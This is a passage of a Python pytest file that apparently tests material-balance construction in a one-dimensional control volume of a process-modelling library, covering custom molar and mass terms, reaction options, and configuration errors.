    """A custom molar term on a mass-basis package works once mw_comp
    (kg/mol) is supplied on each state block."""
    m = ConcreteModel()
    m.fs = Flowsheet(default={"dynamic": False})
    m.fs.pp = PhysicalParameterTestBlock()
    m.fs.pp.basis_switch = 2
    m.fs.rp = ReactionParameterTestBlock(default={"property_package": m.fs.pp})
    m.fs.cv = ControlVolume1DBlock(default={
        "property_package": m.fs.pp,
        "reaction_package": m.fs.rp,
        "transformation_method": "dae.finite_difference",
        "transformation_scheme": "BACKWARD",
        "finite_elements": 10})

    m.fs.cv.add_geometry()
    m.fs.cv.add_state_blocks(has_phase_equilibrium=False)
    m.fs.cv.add_reaction_blocks(has_equilibrium=False)

    m.fs.cv.test_var = Var(m.fs.cv.flowsheet().config.time,
                           m.fs.pp.phase_list,
                           m.fs.pp.component_list)

    def custom_method(t, x, p, j):
        return m.fs.cv.test_var[t, p, j]*units.mol/units.s/units.m

    # Provide molecular weights so the molar term can be converted to mass
    for t in m.fs.time:
        for x in m.fs.cv.length_domain:
            m.fs.cv.properties[t, x].mw_comp = Var(
                m.fs.cv.properties[t, x].config.parameters.component_list,
                units=units.kg/units.mol)

    mb = m.fs.cv.add_phase_component_balances(custom_molar_term=custom_method)

    assert isinstance(mb, Constraint)
    assert len(mb) == 4

    assert_units_consistent(m)
@pytest.mark.unit
def test_add_phase_component_balances_custom_molar_term_undefined_basis():
    """A custom molar term with an undefined property basis (basis_switch=3)
    raises ConfigurationError."""
    m = ConcreteModel()
    m.fs = Flowsheet(default={"dynamic": False})
    m.fs.pp = PhysicalParameterTestBlock()
    m.fs.pp.basis_switch = 3
    m.fs.rp = ReactionParameterTestBlock(default={"property_package": m.fs.pp})
    m.fs.cv = ControlVolume1DBlock(default={
        "property_package": m.fs.pp,
        "reaction_package": m.fs.rp,
        "transformation_method": "dae.finite_difference",
        "transformation_scheme": "BACKWARD",
        "finite_elements": 10})

    m.fs.cv.add_geometry()
    m.fs.cv.add_state_blocks(has_phase_equilibrium=False)
    m.fs.cv.add_reaction_blocks(has_equilibrium=False)

    m.fs.cv.test_var = Var(m.fs.cv.flowsheet().config.time,
                           m.fs.pp.phase_list,
                           m.fs.pp.component_list)

    def custom_method(t, x, p, j):
        return m.fs.cv.test_var[t, p, j]

    with pytest.raises(ConfigurationError):
        m.fs.cv.add_phase_component_balances(custom_molar_term=custom_method)
@pytest.mark.unit
def test_add_phase_component_balances_custom_mass_term():
    """A custom mass term callable (kg/s/m units) on a mass-basis package
    (basis_switch=2) is accepted and the balances build."""
    m = ConcreteModel()
    m.fs = Flowsheet(default={"dynamic": False})
    m.fs.pp = PhysicalParameterTestBlock()
    m.fs.pp.basis_switch = 2
    m.fs.rp = ReactionParameterTestBlock(default={"property_package": m.fs.pp})
    m.fs.cv = ControlVolume1DBlock(default={
        "property_package": m.fs.pp,
        "reaction_package": m.fs.rp,
        "transformation_method": "dae.finite_difference",
        "transformation_scheme": "BACKWARD",
        "finite_elements": 10})

    m.fs.cv.add_geometry()
    m.fs.cv.add_state_blocks(has_phase_equilibrium=False)
    m.fs.cv.add_reaction_blocks(has_equilibrium=False)

    m.fs.cv.test_var = Var(m.fs.cv.flowsheet().config.time,
                           m.fs.pp.phase_list,
                           m.fs.pp.component_list)

    def custom_method(t, x, p, j):
        # Custom term must carry mass flow per length units
        return m.fs.cv.test_var[t, p, j]*units.kg/units.s/units.m

    mb = m.fs.cv.add_phase_component_balances(custom_mass_term=custom_method)

    assert isinstance(mb, Constraint)
    assert len(mb) == 4

    assert_units_consistent(m)
@pytest.mark.unit
def test_add_phase_component_balances_custom_mass_term_no_mw_comp():
    """Mass term on a molar-basis package without mw_comp must raise."""
    m = ConcreteModel()
    m.fs = Flowsheet(default={"dynamic": False})
    m.fs.pp = PhysicalParameterTestBlock()
    m.fs.pp.basis_switch = 1  # molar basis; conversion needs mw_comp
    m.fs.rp = ReactionParameterTestBlock(default={"property_package": m.fs.pp})
    cv_args = {
        "property_package": m.fs.pp,
        "reaction_package": m.fs.rp,
        "transformation_method": "dae.finite_difference",
        "transformation_scheme": "BACKWARD",
        "finite_elements": 10,
    }
    m.fs.cv = ControlVolume1DBlock(default=cv_args)
    m.fs.cv.add_geometry()
    m.fs.cv.add_state_blocks(has_phase_equilibrium=False)
    m.fs.cv.add_reaction_blocks(has_equilibrium=False)
    m.fs.cv.test_var = Var(
        m.fs.cv.flowsheet().config.time,
        m.fs.pp.phase_list,
        m.fs.pp.component_list,
    )

    def custom_method(t, x, p, j):
        return m.fs.cv.test_var[t, p, j]

    with pytest.raises(PropertyNotSupportedError):
        m.fs.cv.add_phase_component_balances(custom_mass_term=custom_method)
@pytest.mark.unit
def test_add_phase_component_balances_custom_mass_term_mole_flow_basis():
    """Custom mass term on a mole-flow-basis package converts via mw_comp.

    Fix: this test is meant to exercise the mass->mole conversion path, so
    the property package must use a molar basis (basis_switch = 1).  The
    previous value of 2 selected a mass basis, in which case the mw_comp
    variables added below were never used (compare the no_mw_comp test
    above, which shows switch 1 + mass term requires mw_comp).
    """
    m = ConcreteModel()
    m.fs = Flowsheet(default={"dynamic": False})
    m.fs.pp = PhysicalParameterTestBlock()
    m.fs.pp.basis_switch = 1  # molar flow basis
    m.fs.rp = ReactionParameterTestBlock(default={"property_package": m.fs.pp})
    m.fs.cv = ControlVolume1DBlock(default={
        "property_package": m.fs.pp,
        "reaction_package": m.fs.rp,
        "transformation_method": "dae.finite_difference",
        "transformation_scheme": "BACKWARD",
        "finite_elements": 10})
    m.fs.cv.add_geometry()
    m.fs.cv.add_state_blocks(has_phase_equilibrium=False)
    m.fs.cv.add_reaction_blocks(has_equilibrium=False)
    m.fs.cv.test_var = Var(m.fs.cv.flowsheet().config.time,
                           m.fs.pp.phase_list,
                           m.fs.pp.component_list)

    def custom_method(t, x, p, j):
        # Mass-rate units; must be divided by mw_comp for a molar balance
        return m.fs.cv.test_var[t, p, j]*units.kg/units.s/units.m

    # Provide molecular weights so the mass term can be converted to moles
    for t in m.fs.time:
        for x in m.fs.cv.length_domain:
            m.fs.cv.properties[t, x].mw_comp = Var(
                m.fs.cv.properties[t, x].config.parameters.component_list,
                units=units.kg/units.mol)
    mb = m.fs.cv.add_phase_component_balances(custom_mass_term=custom_method)
    assert isinstance(mb, Constraint)
    assert len(mb) == 4
    assert_units_consistent(m)
@pytest.mark.unit
def test_add_phase_component_balances_custom_mass_term_undefined_basis():
    """A custom mass term with an undefined material basis must raise."""
    m = ConcreteModel()
    m.fs = Flowsheet(default={"dynamic": False})
    m.fs.pp = PhysicalParameterTestBlock()
    m.fs.pp.basis_switch = 3  # neither molar nor mass basis
    m.fs.rp = ReactionParameterTestBlock(default={"property_package": m.fs.pp})
    cv_args = {
        "property_package": m.fs.pp,
        "reaction_package": m.fs.rp,
        "transformation_method": "dae.finite_difference",
        "transformation_scheme": "BACKWARD",
        "finite_elements": 10,
    }
    m.fs.cv = ControlVolume1DBlock(default=cv_args)
    m.fs.cv.add_geometry()
    m.fs.cv.add_state_blocks(has_phase_equilibrium=False)
    m.fs.cv.add_reaction_blocks(has_equilibrium=False)
    m.fs.cv.test_var = Var(
        m.fs.cv.flowsheet().config.time,
        m.fs.pp.phase_list,
        m.fs.pp.component_list,
    )

    def custom_method(t, x, p, j):
        return m.fs.cv.test_var[t, p, j]

    with pytest.raises(ConfigurationError):
        m.fs.cv.add_phase_component_balances(custom_mass_term=custom_method)
# -----------------------------------------------------------------------------
# Test add_total_component_balances
@pytest.mark.unit
def test_add_total_component_balances_default():
    """BACKWARD scheme: no balance constraint at the inlet node (x = 0)."""
    m = ConcreteModel()
    m.fs = Flowsheet(default={"dynamic": False})
    m.fs.pp = PhysicalParameterTestBlock()
    m.fs.rp = ReactionParameterTestBlock(default={"property_package": m.fs.pp})
    cv_args = {
        "property_package": m.fs.pp,
        "reaction_package": m.fs.rp,
        "transformation_method": "dae.finite_difference",
        "transformation_scheme": "BACKWARD",
        "finite_elements": 10,
    }
    m.fs.cv = ControlVolume1DBlock(default=cv_args)
    m.fs.cv.add_geometry()
    m.fs.cv.add_state_blocks(has_phase_equilibrium=False)
    m.fs.cv.add_reaction_blocks(has_equilibrium=False)

    bal = m.fs.cv.add_total_component_balances()

    assert isinstance(bal, Constraint)
    assert len(bal) == 2
    for j in m.fs.pp.component_list:
        # Backward scheme skips x = 0; constraint exists only at x = 1
        with pytest.raises(KeyError):
            assert m.fs.cv.material_balances[0, 0, j]
        assert type(m.fs.cv.material_balances[0, 1, j]) is \
            _GeneralConstraintData
    assert_units_consistent(m)
@pytest.mark.unit
def test_add_total_component_balances_default_FFD():
    """FORWARD scheme: no balance constraint at the outlet node (x = 1)."""
    m = ConcreteModel()
    m.fs = Flowsheet(default={"dynamic": False})
    m.fs.pp = PhysicalParameterTestBlock()
    m.fs.rp = ReactionParameterTestBlock(default={"property_package": m.fs.pp})
    cv_args = {
        "property_package": m.fs.pp,
        "reaction_package": m.fs.rp,
        "transformation_method": "dae.finite_difference",
        "transformation_scheme": "FORWARD",
        "finite_elements": 10,
    }
    m.fs.cv = ControlVolume1DBlock(default=cv_args)
    m.fs.cv.add_geometry()
    m.fs.cv.add_state_blocks(has_phase_equilibrium=False)
    m.fs.cv.add_reaction_blocks(has_equilibrium=False)

    bal = m.fs.cv.add_total_component_balances()

    assert isinstance(bal, Constraint)
    assert len(bal) == 2
    for j in m.fs.pp.component_list:
        # Forward scheme skips x = 1; constraint exists only at x = 0
        with pytest.raises(KeyError):
            assert m.fs.cv.material_balances[0, 1, j]
        assert type(m.fs.cv.material_balances[0, 0, j]) is \
            _GeneralConstraintData
    assert_units_consistent(m)
@pytest.mark.unit
def test_add_total_component_balances_distrubuted_area():
    """Balances also build with a spatially distributed (variant) area."""
    # NOTE(review): "distrubuted" in the name is a typo for "distributed";
    # kept to preserve the pytest-visible test id.
    m = ConcreteModel()
    m.fs = Flowsheet(default={"dynamic": False})
    m.fs.pp = PhysicalParameterTestBlock()
    m.fs.rp = ReactionParameterTestBlock(default={"property_package": m.fs.pp})
    cv_args = {
        "property_package": m.fs.pp,
        "reaction_package": m.fs.rp,
        "transformation_method": "dae.finite_difference",
        "transformation_scheme": "BACKWARD",
        "finite_elements": 10,
        "area_definition": DistributedVars.variant,
    }
    m.fs.cv = ControlVolume1DBlock(default=cv_args)
    m.fs.cv.add_geometry()
    m.fs.cv.add_state_blocks(has_phase_equilibrium=False)
    m.fs.cv.add_reaction_blocks(has_equilibrium=False)

    bal = m.fs.cv.add_total_component_balances()

    assert isinstance(bal, Constraint)
    assert len(bal) == 2
    assert_units_consistent(m)
@pytest.mark.unit
def test_add_total_component_balances_dynamic():
    """Dynamic mode adds holdup/accumulation variables to the balances."""
    m = ConcreteModel()
    m.fs = Flowsheet(default={"dynamic": True, "time_units": units.s})
    m.fs.pp = PhysicalParameterTestBlock()
    m.fs.rp = ReactionParameterTestBlock(default={"property_package": m.fs.pp})
    cv_args = {
        "property_package": m.fs.pp,
        "reaction_package": m.fs.rp,
        "transformation_method": "dae.finite_difference",
        "transformation_scheme": "BACKWARD",
        "finite_elements": 10,
        "dynamic": True,
    }
    m.fs.cv = ControlVolume1DBlock(default=cv_args)
    m.fs.cv.add_geometry()
    m.fs.cv.add_state_blocks(has_phase_equilibrium=False)
    m.fs.cv.add_reaction_blocks(has_equilibrium=False)

    bal = m.fs.cv.add_total_component_balances()

    assert isinstance(bal, Constraint)
    assert len(bal) == 4
    assert isinstance(m.fs.cv.phase_fraction, Var)
    assert isinstance(m.fs.cv.material_holdup, Var)
    assert isinstance(m.fs.cv.material_accumulation, Var)
    assert_units_consistent(m)
@pytest.mark.unit
def test_add_total_component_balances_rate_rxns():
    """has_rate_reactions adds generation/extent vars and stoichiometry."""
    m = ConcreteModel()
    m.fs = Flowsheet(default={"dynamic": False})
    m.fs.pp = PhysicalParameterTestBlock()
    m.fs.rp = ReactionParameterTestBlock(default={"property_package": m.fs.pp})
    cv_args = {
        "property_package": m.fs.pp,
        "reaction_package": m.fs.rp,
        "transformation_method": "dae.finite_difference",
        "transformation_scheme": "BACKWARD",
        "finite_elements": 10,
    }
    m.fs.cv = ControlVolume1DBlock(default=cv_args)
    m.fs.cv.add_geometry()
    m.fs.cv.add_state_blocks(has_phase_equilibrium=False)
    m.fs.cv.add_reaction_blocks(has_equilibrium=False)

    bal = m.fs.cv.add_total_component_balances(has_rate_reactions=True)

    assert isinstance(bal, Constraint)
    assert len(bal) == 2
    assert isinstance(m.fs.cv.rate_reaction_generation, Var)
    assert isinstance(m.fs.cv.rate_reaction_extent, Var)
    assert isinstance(m.fs.cv.rate_reaction_stoichiometry_constraint,
                      Constraint)
    assert_units_consistent(m)
@pytest.mark.unit
def test_add_total_component_balances_rate_rxns_no_ReactionBlock():
    """Rate reactions without a reaction package/block must raise."""
    m = ConcreteModel()
    m.fs = Flowsheet(default={"dynamic": False})
    m.fs.pp = PhysicalParameterTestBlock()
    m.fs.rp = ReactionParameterTestBlock(default={"property_package": m.fs.pp})
    # Note: no "reaction_package" entry and no add_reaction_blocks call
    cv_args = {
        "property_package": m.fs.pp,
        "transformation_method": "dae.finite_difference",
        "transformation_scheme": "BACKWARD",
        "finite_elements": 10,
    }
    m.fs.cv = ControlVolume1DBlock(default=cv_args)
    m.fs.cv.add_geometry()
    m.fs.cv.add_state_blocks(has_phase_equilibrium=False)

    with pytest.raises(ConfigurationError):
        m.fs.cv.add_total_component_balances(has_rate_reactions=True)
@pytest.mark.unit
def test_add_total_component_balances_rate_rxns_no_rxn_idx():
    """Missing rate_reaction_idx in the reaction package must raise."""
    m = ConcreteModel()
    m.fs = Flowsheet(default={"dynamic": False})
    m.fs.pp = PhysicalParameterTestBlock()
    m.fs.rp = ReactionParameterTestBlock(default={"property_package": m.fs.pp})
    # Remove the rate reaction index set to trigger the error
    m.fs.rp.del_component(m.fs.rp.rate_reaction_idx)
    cv_args = {
        "property_package": m.fs.pp,
        "reaction_package": m.fs.rp,
        "transformation_method": "dae.finite_difference",
        "transformation_scheme": "BACKWARD",
        "finite_elements": 10,
    }
    m.fs.cv = ControlVolume1DBlock(default=cv_args)
    m.fs.cv.add_geometry()
    m.fs.cv.add_state_blocks(has_phase_equilibrium=False)
    m.fs.cv.add_reaction_blocks(has_equilibrium=False)

    with pytest.raises(PropertyNotSupportedError):
        m.fs.cv.add_total_component_balances(has_rate_reactions=True)
@pytest.mark.unit
def test_add_total_component_balances_eq_rxns():
    """has_equilibrium_reactions adds generation/extent and stoichiometry."""
    m = ConcreteModel()
    m.fs = Flowsheet(default={"dynamic": False})
    m.fs.pp = PhysicalParameterTestBlock()
    m.fs.rp = ReactionParameterTestBlock(default={"property_package": m.fs.pp})
    cv_args = {
        "property_package": m.fs.pp,
        "reaction_package": m.fs.rp,
        "transformation_method": "dae.finite_difference",
        "transformation_scheme": "BACKWARD",
        "finite_elements": 10,
    }
    m.fs.cv = ControlVolume1DBlock(default=cv_args)
    m.fs.cv.add_geometry()
    m.fs.cv.add_state_blocks(has_phase_equilibrium=False)
    m.fs.cv.add_reaction_blocks(has_equilibrium=True)

    bal = m.fs.cv.add_total_component_balances(has_equilibrium_reactions=True)

    assert isinstance(bal, Constraint)
    assert len(bal) == 2
    assert isinstance(m.fs.cv.equilibrium_reaction_generation, Var)
    assert isinstance(m.fs.cv.equilibrium_reaction_extent, Var)
    assert isinstance(m.fs.cv.equilibrium_reaction_stoichiometry_constraint,
                      Constraint)
    assert_units_consistent(m)
@pytest.mark.unit
def test_add_total_component_balances_eq_rxns_not_active():
    """Equilibrium reactions without equilibrium reaction blocks must raise."""
    m = ConcreteModel()
    m.fs = Flowsheet(default={"dynamic": False})
    m.fs.pp = PhysicalParameterTestBlock()
    m.fs.rp = ReactionParameterTestBlock(default={"property_package": m.fs.pp})
    cv_args = {
        "property_package": m.fs.pp,
        "reaction_package": m.fs.rp,
        "transformation_method": "dae.finite_difference",
        "transformation_scheme": "BACKWARD",
        "finite_elements": 10,
    }
    m.fs.cv = ControlVolume1DBlock(default=cv_args)
    m.fs.cv.add_geometry()
    m.fs.cv.add_state_blocks(has_phase_equilibrium=False)
    # Reaction blocks built WITHOUT equilibrium support
    m.fs.cv.add_reaction_blocks(has_equilibrium=False)

    with pytest.raises(ConfigurationError):
        m.fs.cv.add_total_component_balances(has_equilibrium_reactions=True)
@pytest.mark.unit
def test_add_total_component_balances_eq_rxns_no_idx():
    """Missing equilibrium_reaction_idx must raise."""
    m = ConcreteModel()
    m.fs = Flowsheet(default={"dynamic": False})
    m.fs.pp = PhysicalParameterTestBlock()
    m.fs.rp = ReactionParameterTestBlock(default={"property_package": m.fs.pp})
    # Remove the equilibrium reaction index set to trigger the error
    m.fs.rp.del_component(m.fs.rp.equilibrium_reaction_idx)
    cv_args = {
        "property_package": m.fs.pp,
        "reaction_package": m.fs.rp,
        "transformation_method": "dae.finite_difference",
        "transformation_scheme": "BACKWARD",
        "finite_elements": 10,
    }
    m.fs.cv = ControlVolume1DBlock(default=cv_args)
    m.fs.cv.add_geometry()
    m.fs.cv.add_state_blocks(has_phase_equilibrium=False)
    m.fs.cv.add_reaction_blocks(has_equilibrium=True)

    with pytest.raises(PropertyNotSupportedError):
        m.fs.cv.add_total_component_balances(has_equilibrium_reactions=True)
@pytest.mark.unit
def test_add_total_component_balances_eq_rxns_no_ReactionBlock():
    """Equilibrium reactions without a reaction package/block must raise."""
    m = ConcreteModel()
    m.fs = Flowsheet(default={"dynamic": False})
    m.fs.pp = PhysicalParameterTestBlock()
    m.fs.rp = ReactionParameterTestBlock(default={"property_package": m.fs.pp})
    # Note: no "reaction_package" entry and no add_reaction_blocks call
    cv_args = {
        "property_package": m.fs.pp,
        "transformation_method": "dae.finite_difference",
        "transformation_scheme": "BACKWARD",
        "finite_elements": 10,
    }
    m.fs.cv = ControlVolume1DBlock(default=cv_args)
    m.fs.cv.add_geometry()
    m.fs.cv.add_state_blocks(has_phase_equilibrium=False)

    with pytest.raises(ConfigurationError):
        m.fs.cv.add_total_component_balances(has_equilibrium_reactions=True)
@pytest.mark.unit
def test_add_total_component_balances_in_rxns():
    """A package flagged with inherent reactions gets inherent-reaction terms."""
    m = ConcreteModel()
    m.fs = Flowsheet(default={"dynamic": False})
    m.fs.pp = PhysicalParameterTestBlock()
    # Flag the property package as containing inherent reactions
    m.fs.pp._has_inherent_reactions = True
    cv_args = {
        "property_package": m.fs.pp,
        "transformation_method": "dae.finite_difference",
        "transformation_scheme": "BACKWARD",
        "finite_elements": 10,
    }
    m.fs.cv = ControlVolume1DBlock(default=cv_args)
    m.fs.cv.add_geometry()
    m.fs.cv.add_state_blocks(has_phase_equilibrium=False)

    bal = m.fs.cv.add_total_component_balances()

    assert isinstance(bal, Constraint)
    assert len(bal) == 2
    assert isinstance(m.fs.cv.inherent_reaction_generation, Var)
    assert isinstance(m.fs.cv.inherent_reaction_extent, Var)
    assert isinstance(m.fs.cv.inherent_reaction_stoichiometry_constraint,
                      Constraint)
    assert_units_consistent(m)
@pytest.mark.unit
def test_add_total_component_balances_in_rxns_no_idx():
    """Inherent reactions flagged but inherent_reaction_idx missing must raise."""
    m = ConcreteModel()
    m.fs = Flowsheet(default={"dynamic": False})
    m.fs.pp = PhysicalParameterTestBlock()
    # Set property package to contain inherent reactions
    m.fs.pp._has_inherent_reactions = True
    # Delete inherent_reaction_idx to trigger the exception
    m.fs.pp.del_component(m.fs.pp.inherent_reaction_idx)
    m.fs.cv = ControlVolume1DBlock(default={
        "property_package": m.fs.pp,
        "transformation_method": "dae.finite_difference",
        "transformation_scheme": "BACKWARD",
        "finite_elements": 10})
    m.fs.cv.add_geometry()
    m.fs.cv.add_state_blocks(has_phase_equilibrium=False)
    # match= is a regex: the escaped parentheses require a raw string.
    # The previous plain string used "\(", an invalid escape sequence
    # (SyntaxWarning on Python 3.12+, slated to become an error).
    with pytest.raises(PropertyNotSupportedError,
                       match=r"fs.cv Property package does not contain a "
                             r"list of inherent reactions \(inherent_reaction_idx\), "
                             r"but include_inherent_reactions is True."):
        m.fs.cv.add_total_component_balances()
@pytest.mark.unit
def test_add_total_component_balances_phase_eq_not_active():
    """Phase equilibrium balances without equilibrium state blocks must raise."""
    m = ConcreteModel()
    m.fs = Flowsheet(default={"dynamic": False})
    m.fs.pp = PhysicalParameterTestBlock()
    m.fs.rp = ReactionParameterTestBlock(default={"property_package": m.fs.pp})
    cv_args = {
        "property_package": m.fs.pp,
        "reaction_package": m.fs.rp,
        "transformation_method": "dae.finite_difference",
        "transformation_scheme": "BACKWARD",
        "finite_elements": 10,
    }
    m.fs.cv = ControlVolume1DBlock(default=cv_args)
    m.fs.cv.add_geometry()
    # State blocks built WITHOUT phase equilibrium support
    m.fs.cv.add_state_blocks(has_phase_equilibrium=False)
    m.fs.cv.add_reaction_blocks(has_equilibrium=False)

    with pytest.raises(ConfigurationError):
        m.fs.cv.add_total_component_balances(has_phase_equilibrium=True)
@pytest.mark.unit
def test_add_total_component_balances_mass_transfer():
    """has_mass_transfer adds a mass_transfer_term variable."""
    m = ConcreteModel()
    m.fs = Flowsheet(default={"dynamic": False})
    m.fs.pp = PhysicalParameterTestBlock()
    m.fs.rp = ReactionParameterTestBlock(default={"property_package": m.fs.pp})
    cv_args = {
        "property_package": m.fs.pp,
        "reaction_package": m.fs.rp,
        "transformation_method": "dae.finite_difference",
        "transformation_scheme": "BACKWARD",
        "finite_elements": 10,
    }
    m.fs.cv = ControlVolume1DBlock(default=cv_args)
    m.fs.cv.add_geometry()
    m.fs.cv.add_state_blocks(has_phase_equilibrium=False)
    m.fs.cv.add_reaction_blocks(has_equilibrium=False)

    bal = m.fs.cv.add_total_component_balances(has_mass_transfer=True)

    assert isinstance(bal, Constraint)
    assert len(bal) == 2
    assert isinstance(m.fs.cv.mass_transfer_term, Var)
    assert_units_consistent(m)
@pytest.mark.unit
def test_add_total_component_balances_custom_molar_term():
    """Custom molar term on a molar-basis package adds directly."""
    m = ConcreteModel()
    m.fs = Flowsheet(default={"dynamic": False})
    m.fs.pp = PhysicalParameterTestBlock()
    m.fs.rp = ReactionParameterTestBlock(default={"property_package": m.fs.pp})
    cv_args = {
        "property_package": m.fs.pp,
        "reaction_package": m.fs.rp,
        "transformation_method": "dae.finite_difference",
        "transformation_scheme": "BACKWARD",
        "finite_elements": 10,
    }
    m.fs.cv = ControlVolume1DBlock(default=cv_args)
    m.fs.cv.add_geometry()
    m.fs.cv.add_state_blocks(has_phase_equilibrium=False)
    m.fs.cv.add_reaction_blocks(has_equilibrium=False)
    m.fs.cv.test_var = Var(
        m.fs.cv.flowsheet().config.time,
        m.fs.pp.component_list,
    )

    def custom_method(t, x, j):
        # mol/s/m matches the molar-basis balance units
        return m.fs.cv.test_var[t, j] * units.mol / units.s / units.m

    bal = m.fs.cv.add_total_component_balances(custom_molar_term=custom_method)

    assert isinstance(bal, Constraint)
    assert len(bal) == 2
    assert_units_consistent(m)
@pytest.mark.unit
def test_add_total_component_balances_custom_molar_term_no_mw():
    """Molar term on a mass-basis package without mw_comp must raise."""
    m = ConcreteModel()
    m.fs = Flowsheet(default={"dynamic": False})
    m.fs.pp = PhysicalParameterTestBlock()
    m.fs.pp.basis_switch = 2  # mass basis; conversion needs mw_comp
    m.fs.rp = ReactionParameterTestBlock(default={"property_package": m.fs.pp})
    cv_args = {
        "property_package": m.fs.pp,
        "reaction_package": m.fs.rp,
        "transformation_method": "dae.finite_difference",
        "transformation_scheme": "BACKWARD",
        "finite_elements": 10,
    }
    m.fs.cv = ControlVolume1DBlock(default=cv_args)
    m.fs.cv.add_geometry()
    m.fs.cv.add_state_blocks(has_phase_equilibrium=False)
    m.fs.cv.add_reaction_blocks(has_equilibrium=False)
    m.fs.cv.test_var = Var(
        m.fs.cv.flowsheet().config.time,
        m.fs.pp.component_list,
    )

    def custom_method(t, x, j):
        return m.fs.cv.test_var[t, j]

    with pytest.raises(PropertyNotSupportedError):
        m.fs.cv.add_total_component_balances(custom_molar_term=custom_method)
@pytest.mark.unit
def test_add_total_component_balances_custom_molar_term_mass_flow_basis():
    """Custom molar term on a mass-basis package converts via mw_comp."""
    m = ConcreteModel()
    m.fs = Flowsheet(default={"dynamic": False})
    m.fs.pp = PhysicalParameterTestBlock()
    m.fs.pp.basis_switch = 2  # mass flow basis
    m.fs.rp = ReactionParameterTestBlock(default={"property_package": m.fs.pp})
    cv_args = {
        "property_package": m.fs.pp,
        "reaction_package": m.fs.rp,
        "transformation_method": "dae.finite_difference",
        "transformation_scheme": "BACKWARD",
        "finite_elements": 10,
    }
    m.fs.cv = ControlVolume1DBlock(default=cv_args)
    m.fs.cv.add_geometry()
    m.fs.cv.add_state_blocks(has_phase_equilibrium=False)
    m.fs.cv.add_reaction_blocks(has_equilibrium=False)
    m.fs.cv.test_var = Var(
        m.fs.cv.flowsheet().config.time,
        m.fs.pp.component_list,
    )

    def custom_method(t, x, j):
        return m.fs.cv.test_var[t, j] * units.mol / units.s / units.m

    # Provide molecular weights so the molar term can be converted to mass
    for t in m.fs.time:
        for x in m.fs.cv.length_domain:
            m.fs.cv.properties[t, x].mw_comp = Var(
                m.fs.cv.properties[t, x].config.parameters.component_list,
                units=units.kg / units.mol,
            )

    bal = m.fs.cv.add_total_component_balances(custom_molar_term=custom_method)

    assert isinstance(bal, Constraint)
    assert len(bal) == 2
    assert_units_consistent(m)
@pytest.mark.unit
def test_add_total_component_balances_custom_molar_term_undefined_basis():
    """A custom molar term with an undefined material basis must raise."""
    m = ConcreteModel()
    m.fs = Flowsheet(default={"dynamic": False})
    m.fs.pp = PhysicalParameterTestBlock()
    m.fs.pp.basis_switch = 3  # neither molar nor mass basis
    m.fs.rp = ReactionParameterTestBlock(default={"property_package": m.fs.pp})
    cv_args = {
        "property_package": m.fs.pp,
        "reaction_package": m.fs.rp,
        "transformation_method": "dae.finite_difference",
        "transformation_scheme": "BACKWARD",
        "finite_elements": 10,
    }
    m.fs.cv = ControlVolume1DBlock(default=cv_args)
    m.fs.cv.add_geometry()
    m.fs.cv.add_state_blocks(has_phase_equilibrium=False)
    m.fs.cv.add_reaction_blocks(has_equilibrium=False)
    m.fs.cv.test_var = Var(
        m.fs.cv.flowsheet().config.time,
        m.fs.pp.component_list,
    )

    def custom_method(t, x, j):
        return m.fs.cv.test_var[t, j]

    with pytest.raises(ConfigurationError):
        m.fs.cv.add_total_component_balances(custom_molar_term=custom_method)
@pytest.mark.unit
def test_add_total_component_balances_custom_mass_term():
    """Custom mass term on a mass-basis package adds directly."""
    m = ConcreteModel()
    m.fs = Flowsheet(default={"dynamic": False})
    m.fs.pp = PhysicalParameterTestBlock()
    m.fs.pp.basis_switch = 2  # mass basis
    m.fs.rp = ReactionParameterTestBlock(default={"property_package": m.fs.pp})
    cv_args = {
        "property_package": m.fs.pp,
        "reaction_package": m.fs.rp,
        "transformation_method": "dae.finite_difference",
        "transformation_scheme": "BACKWARD",
        "finite_elements": 10,
    }
    m.fs.cv = ControlVolume1DBlock(default=cv_args)
    m.fs.cv.add_geometry()
    m.fs.cv.add_state_blocks(has_phase_equilibrium=False)
    m.fs.cv.add_reaction_blocks(has_equilibrium=False)
    m.fs.cv.test_var = Var(
        m.fs.cv.flowsheet().config.time,
        m.fs.pp.component_list,
    )

    def custom_method(t, x, j):
        return m.fs.cv.test_var[t, j] * units.kg / units.s / units.m

    bal = m.fs.cv.add_total_component_balances(custom_mass_term=custom_method)

    assert isinstance(bal, Constraint)
    assert len(bal) == 2
    assert_units_consistent(m)
@pytest.mark.unit
def test_add_total_component_balances_custom_mass_term_no_mw():
    """Mass term on a molar-basis package without mw_comp must raise."""
    m = ConcreteModel()
    m.fs = Flowsheet(default={"dynamic": False})
    m.fs.pp = PhysicalParameterTestBlock()
    m.fs.pp.basis_switch = 1  # molar basis; conversion needs mw_comp
    m.fs.rp = ReactionParameterTestBlock(default={"property_package": m.fs.pp})
    cv_args = {
        "property_package": m.fs.pp,
        "reaction_package": m.fs.rp,
        "transformation_method": "dae.finite_difference",
        "transformation_scheme": "BACKWARD",
        "finite_elements": 10,
    }
    m.fs.cv = ControlVolume1DBlock(default=cv_args)
    m.fs.cv.add_geometry()
    m.fs.cv.add_state_blocks(has_phase_equilibrium=False)
    m.fs.cv.add_reaction_blocks(has_equilibrium=False)
    m.fs.cv.test_var = Var(
        m.fs.cv.flowsheet().config.time,
        m.fs.pp.component_list,
    )

    def custom_method(t, x, j):
        return m.fs.cv.test_var[t, j]

    with pytest.raises(PropertyNotSupportedError):
        m.fs.cv.add_total_component_balances(custom_mass_term=custom_method)
@pytest.mark.unit
def test_add_total_component_balances_custom_mass_term_mole_flow_basis():
    """Custom mass term on a mole-flow-basis package converts via mw_comp.

    Fix: this test is meant to exercise the mass->mole conversion path, so
    the property package must use a molar basis (basis_switch = 1).  The
    previous value of 2 selected a mass basis, in which case the mw_comp
    variables added below were never used (compare the no_mw test above,
    which shows switch 1 + mass term requires mw_comp).
    """
    m = ConcreteModel()
    m.fs = Flowsheet(default={"dynamic": False})
    m.fs.pp = PhysicalParameterTestBlock()
    m.fs.pp.basis_switch = 1  # molar flow basis
    m.fs.rp = ReactionParameterTestBlock(default={"property_package": m.fs.pp})
    m.fs.cv = ControlVolume1DBlock(default={
        "property_package": m.fs.pp,
        "reaction_package": m.fs.rp,
        "transformation_method": "dae.finite_difference",
        "transformation_scheme": "BACKWARD",
        "finite_elements": 10})
    m.fs.cv.add_geometry()
    m.fs.cv.add_state_blocks(has_phase_equilibrium=False)
    m.fs.cv.add_reaction_blocks(has_equilibrium=False)
    m.fs.cv.test_var = Var(m.fs.cv.flowsheet().config.time,
                           m.fs.pp.component_list)

    def custom_method(t, x, j):
        # Mass-rate units; must be divided by mw_comp for a molar balance
